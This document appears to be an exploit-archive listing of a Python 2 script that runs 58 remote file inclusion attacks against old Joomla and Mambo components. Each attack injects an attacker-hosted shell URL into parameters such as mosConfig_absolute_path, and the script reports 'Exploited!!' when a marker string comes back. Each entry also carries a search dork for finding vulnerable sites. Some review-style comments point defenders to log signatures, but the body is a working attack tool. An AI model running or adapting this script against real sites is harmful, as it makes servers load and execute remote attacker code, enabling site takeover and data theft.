
Joomla Exploit Scanner

Joomla Exploit Scanner
Posted Oct 14, 2010
Authored by Jesus Olmos Gonzalez

This Python script scans a Joomla site for 58 vulnerable component payloads.

tags | tool, scanner, python
systems | unix
SHA-256 | 26c1dd792718beea62e8eb0ab2d6c9e865e5fd26795e1320d27ddd6b697c5805

Joomla Exploit Scanner

#!/usr/bin/python
# Multi-exploit for Joomla by jolmos@buguroo.com
# Implements the 58 Joomla exploits summarized by Mr.aFiR_ on http://www.exploit-db.com/papers/13633/

import urllib2
import re
import sys


class Exploit:
    """One probe definition: a search dork plus a URL path template for a Joomla component.

    The template in `url` carries the literal placeholder '##' at the point where
    the caller's `rfishell` value is substituted before the request is issued.
    """

    def __init__(self, dork, url):
        # `dork` is only stored for reference; run() never reads it.
        self.url = url
        self.dork = dork

    def run(self, target, rfishell):
        """Fetch target + url (with '##' replaced by rfishell) and report the outcome.

        Returns True when the response body contains the fixed marker string,
        False when the marker is absent or when fetching raised any exception.
        Every branch also prints a one-line status prefixed with the outcome.
        """
        xplt = self.url
        # Placeholder substitution; a template without '##' is requested unchanged.
        xplt = xplt.replace('##', rfishell)
        url = '%s%s' % (target, xplt)
        try:
            req = urllib2.urlopen(url)
            data = req.read()
            # Fixed marker searched for in the response body.
            # NOTE(review): presumably emitted by the remotely included file; the
            # literal is a stable indicator for response-side detection rules.
            if data.find('o2ij3oiwudjf') == -1:
                print "[ Failed ] %s" % url
                return False

            print "[ Exploited!! ] %s" % url
            return True
        except:
            # Bare except: DNS failures, timeouts and every HTTP error status are all
            # reported under the "404" label, so the printed label is not reliable.
            print "[ 404 ] %s" % url
            return False



class MultiExploit:
    """Holds the ordered list of Exploit probes and runs them against one target.

    The list is populated by load() at construction time; launch() walks it in
    insertion order and stops at the first probe whose run() returns True.
    """

    def __init__(self):
        self.exploits = []
        # Value substituted for '##' in every template. This is a placeholder the
        # operator is expected to replace; the trailing '???' is carried verbatim.
        self.rfishell = 'http://yourshellhere.com/shell.txt???'
        self.load()

    def load(self):
        """Populate self.exploits with the 58 (dork, path-template) pairs.

        Each template names a component script and a query parameter
        (mosConfig_absolute_path, absolute_path, phpbb_root_path, ...) whose
        value is the '##' substitution point. For defenders, requests carrying
        these paths and parameter names are the signature to alert on in
        web-server or WAF logs; most of them target long-retired Joomla/Mambo
        components.
        """
        self.exploits.append(Exploit('inurl:"com_admin"','/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:index.php?option=com_simpleboard','/components/com_simpleboard/file_upload.php?sbp=##'))
        self.exploits.append(Exploit('inurl:"com_hashcash"','/components/com_hashcash/server.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_htmlarea3_xtd-c"','/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_sitemap"','/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_performs"','/components/com_performs/performs.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_forum"','/components/com_forum/download.php?phpbb_root_path=##'))
        self.exploits.append(Exploit('inurl:"com_pccookbook"','/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:index.php?option=com_extcalendar','/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"minibb"','/components/minibb/index.php?absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_smf"','/components/com_smf/smf.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_smf"','/modules/mod_calendar.php?absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_pollxt"','/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_loudmounth"','/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_videodb"','/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:index.php?option=com_pcchess','/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_multibanners"','/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_a6mambohelpdesk"','/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=##'))
        self.exploits.append(Exploit('inurl:"com_colophon"','/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_mgm"','/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_mambatstaff"','/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/configinsert.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/lang.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_artlinks"','/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_galleria"','/components/com_galleria/galleria.html.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_akocomment"','/akocomments.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_cropimage"','/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=##'))
        self.exploits.append(Exploit('inurl:"com_kochsuite"','/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_comprofiler"','/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/includes/database.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_serverstat"','/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:"com_fm"','/components/com_fm/fm.install.php?lm_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_mambelfish','/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_lmo','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_linkdirectory','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_linkdirectory','/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_mtree','/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_jim','/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_webring','/administrator/components/com_webring/admin.webring.docs.php?component_dir=##'))
        self.exploits.append(Exploit('inurl:com_remository','/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path='))
        self.exploits.append(Exploit('inurl:com_babackup','/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_lurm_constructor','/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_mambowiki','/components/com_mambowiki/MamboLogin.php?IP=##'))
        self.exploits.append(Exploit('inurl:com_a6mambocredits','/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=##'))
        self.exploits.append(Exploit('inurl:com_phpshop','/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_cpg','/components/com_cpg/cpg.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_moodle','/components/com_moodle/moodle.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_extended_registration','/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_mospray','/components/com_mospray/scripts/admin.php?basedir=##'))
        self.exploits.append(Exploit('inurl:com_bayesiannaivefilter','/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_uhp','/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_peoplebook','/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_mmp','/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_reporter','/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_madeira','/components/com_madeira/img.php?url=##'))
        self.exploits.append(Exploit('inurl:com_jd-wiki','/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=##'))
        self.exploits.append(Exploit('inurl:com_bsq_sitestats','/components/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))
        self.exploits.append(Exploit('inurl:com_bsq_sitestats','/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))

    def launch(self, target):
        """Run each probe against `target` in order; stop after the first success.

        Returns None in every case; results are only printed by Exploit.run().
        A full pass with no success issues one request per entry (58 requests),
        which is the burst a rate-based detection would see.
        """
        for xplt in self.exploits:
            if xplt.run(target, self.rfishell):
                return


if __name__ == '__main__':
    # Exactly one positional argument is accepted: the base URL of the site.
    if (len(sys.argv) != 2):
        # NOTE: the '%s' in this usage line has no argument applied, so it is
        # printed literally; sys.argv[0] was presumably intended.
        print 'usage: %s http://vulnerable.com/joomla/'
        sys.exit(1)

    me = MultiExploit()
    me.launch(sys.argv[1])

